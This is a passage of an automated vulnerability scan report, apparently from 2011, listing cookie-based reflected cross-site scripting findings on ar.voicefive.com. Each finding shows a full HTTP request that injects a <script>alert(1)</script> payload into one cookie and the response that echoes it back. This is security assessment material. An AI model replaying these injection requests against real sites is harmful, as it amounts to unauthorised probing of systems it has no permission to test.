This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /b/node_rcAll.pli?func=COMSCORE.BMX.Buddy.run&1308010663788 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/mtv.mtvi/survey;sec0=music;sec1=_mn;node=survey;sz=1x2;ord=733653447125107100?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&96c60<script>alert(1)</script>4bda17080c7; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; BMX_BR=pid=p104567837&prad=63567820&arc=42361216&exp=1308010528; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; UID=4a757a7-24.143.206.42-1305663172; BMX_3PC=1

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:17:45 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_G=0; expires=Thu 18-Sep-2008 00:17:45 GMT; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 1557

COMSCORE.BMX.Buddy.run({ "ar_p97464717": 'exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&', "ar_p101866669": 'exp=1&initExp=Sat May 21 12:32:54 2011&
...[SNIP]...
9:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&', "ar_p81479006": 'exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&96c60<script>alert(1)</script>4bda17080c7' });

3.57. http://ar.voicefive.com/b/node_rcAll.pli [ar_p82806590 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/node_rcAll.pli

Issue detail

The value of the ar_p82806590 cookie is copied into the HTML document as plain text between tags. The payload 69309<script>alert(1)</script>3ac55d912d3 was submitted in the ar_p82806590 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /b/node_rcAll.pli?func=COMSCORE.BMX.Buddy.run&1308010663788 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/mtv.mtvi/survey;sec0=music;sec1=_mn;node=survey;sz=1x2;ord=733653447125107100?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&69309<script>alert(1)</script>3ac55d912d3; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; BMX_BR=pid=p104567837&prad=63567820&arc=42361216&exp=1308010528; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; UID=4a757a7-24.143.206.42-1305663172; BMX_3PC=1

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:17:45 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_G=0; expires=Thu 18-Sep-2008 00:17:45 GMT; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 1557

COMSCORE.BMX.Buddy.run({ "ar_p97464717": 'exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&', "ar_p101866669": 'exp=1&initExp=Sat May 21 12:32:54 2011&
...[SNIP]...
May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&', "ar_p82806590": 'exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&69309<script>alert(1)</script>3ac55d912d3', "BMX_G": '0', "ar_p84552060": 'exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&', "ar_p20101109": 'exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mo
...[SNIP]...

3.58. http://ar.voicefive.com/b/node_rcAll.pli [ar_p84552060 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/node_rcAll.pli

Issue detail

The value of the ar_p84552060 cookie is copied into the HTML document as plain text between tags. The payload 9bae7<script>alert(1)</script>d8f791fc7fb was submitted in the ar_p84552060 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /b/node_rcAll.pli?func=COMSCORE.BMX.Buddy.run&1308010663788 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/mtv.mtvi/survey;sec0=music;sec1=_mn;node=survey;sz=1x2;ord=733653447125107100?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&9bae7<script>alert(1)</script>d8f791fc7fb; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; BMX_BR=pid=p104567837&prad=63567820&arc=42361216&exp=1308010528; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; UID=4a757a7-24.143.206.42-1305663172; BMX_3PC=1

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:17:45 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_G=0; expires=Thu 18-Sep-2008 00:17:45 GMT; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 1557

COMSCORE.BMX.Buddy.run({ "ar_p97464717": 'exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&', "ar_p101866669": 'exp=1&initExp=Sat May 21 12:32:54 2011&
...[SNIP]...
2:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&', "BMX_G": '0', "ar_p84552060": 'exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&9bae7<script>alert(1)</script>d8f791fc7fb', "ar_p20101109": 'exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&', "ar_p56282763": 'exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2
...[SNIP]...

3.59. http://ar.voicefive.com/b/node_rcAll.pli [ar_p91143664 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/node_rcAll.pli

Issue detail

The value of the ar_p91143664 cookie is copied into the HTML document as plain text between tags. The payload 20f87<script>alert(1)</script>2527a3b6a73 was submitted in the ar_p91143664 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /b/node_rcAll.pli?func=COMSCORE.BMX.Buddy.run&1308010663788 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/mtv.mtvi/survey;sec0=music;sec1=_mn;node=survey;sz=1x2;ord=733653447125107100?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&20f87<script>alert(1)</script>2527a3b6a73; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; BMX_BR=pid=p104567837&prad=63567820&arc=42361216&exp=1308010528; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; UID=4a757a7-24.143.206.42-1305663172; BMX_3PC=1

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:17:44 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_G=0; expires=Thu 18-Sep-2008 00:17:44 GMT; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 1557

COMSCORE.BMX.Buddy.run({ "ar_p97464717": 'exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&', "ar_p101866669": 'exp=1&initExp=Sat May 21 12:32:54 2011&
...[SNIP]...
42330646&', "BMX_BR": 'pid=p104567837&prad=63567820&arc=42361216&exp=1308010528', "ar_p91143664": 'exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&20f87<script>alert(1)</script>2527a3b6a73', "ar_p81479006": 'exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&' });

3.60. http://ar.voicefive.com/b/node_rcAll.pli [ar_p97174789 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/node_rcAll.pli

Issue detail

The value of the ar_p97174789 cookie is copied into the HTML document as plain text between tags. The payload 5e81e<script>alert(1)</script>764a5040dac was submitted in the ar_p97174789 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /b/node_rcAll.pli?func=COMSCORE.BMX.Buddy.run&1308010663788 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/mtv.mtvi/survey;sec0=music;sec1=_mn;node=survey;sz=1x2;ord=733653447125107100?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&5e81e<script>alert(1)</script>764a5040dac; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; BMX_BR=pid=p104567837&prad=63567820&arc=42361216&exp=1308010528; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; UID=4a757a7-24.143.206.42-1305663172; BMX_3PC=1

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:17:45 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_G=0; expires=Thu 18-Sep-2008 00:17:45 GMT; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 1557

COMSCORE.BMX.Buddy.run({ "ar_p97464717": 'exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&', "ar_p101866669": 'exp=1&initExp=Sat May 21 12:32:54 2011&
...[SNIP]...
Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&', "ar_p97174789": 'exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&5e81e<script>alert(1)</script>764a5040dac', "ar_p82806590": 'exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&', "BMX_G": '0', "ar_p84552060": 'exp=1&initExp=Sat May 21 12:33:10 2011&recExp=
...[SNIP]...

3.61. http://ar.voicefive.com/b/node_rcAll.pli [ar_p97464717 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/node_rcAll.pli

Issue detail

The value of the ar_p97464717 cookie is copied into the HTML document as plain text between tags. The payload 35678<script>alert(1)</script>3fd8551a319 was submitted in the ar_p97464717 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /b/node_rcAll.pli?func=COMSCORE.BMX.Buddy.run&1308010663788 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/mtv.mtvi/survey;sec0=music;sec1=_mn;node=survey;sz=1x2;ord=733653447125107100?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&35678<script>alert(1)</script>3fd8551a319; BMX_BR=pid=p104567837&prad=63567820&arc=42361216&exp=1308010528; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; UID=4a757a7-24.143.206.42-1305663172; BMX_3PC=1

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:17:46 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_G=0; expires=Thu 18-Sep-2008 00:17:46 GMT; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 1557

COMSCORE.BMX.Buddy.run({ "ar_p97464717": 'exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&35678<script>alert(1)</script>3fd8551a319', "ar_p101866669": 'exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&', "ar_p104567837": 'exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14
...[SNIP]...

3.62. http://ar.voicefive.com/bmx3/node.pli [BMX_BR cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/node.pli

Issue detail

The value of the BMX_BR cookie is copied into the HTML document as plain text between tags. The payload 4fcdf<script>alert(1)</script>8ee39c256d0 was submitted in the BMX_BR cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/node.pli?pub=mtv HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/mtv.mtvi/survey;sec0=music;sec1=_mn;node=survey;sz=1x2;ord=733653447125107100?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; BMX_BR=pid=p104567837&prad=63567820&arc=42361216&exp=13080105284fcdf<script>alert(1)</script>8ee39c256d0; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; UID=4a757a7-24.143.206.42-1305663172

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:17:37 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 16068

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Buddy)!="undefined"){}else{if(typeof(COMSCORE)=="undefined"){var COMSCORE={};
}if(typeof(COMSCORE.BMX)=="undef
...[SNIP]...
X_3PC": '1', "ar_p101945457": 'exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&', "BMX_BR": 'pid=p104567837&prad=63567820&arc=42361216&exp=13080105284fcdf<script>alert(1)</script>8ee39c256d0', "ar_p91143664": 'exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&', "ar_p81479006": 'exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10
...[SNIP]...

3.63. http://ar.voicefive.com/bmx3/node.pli [UID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
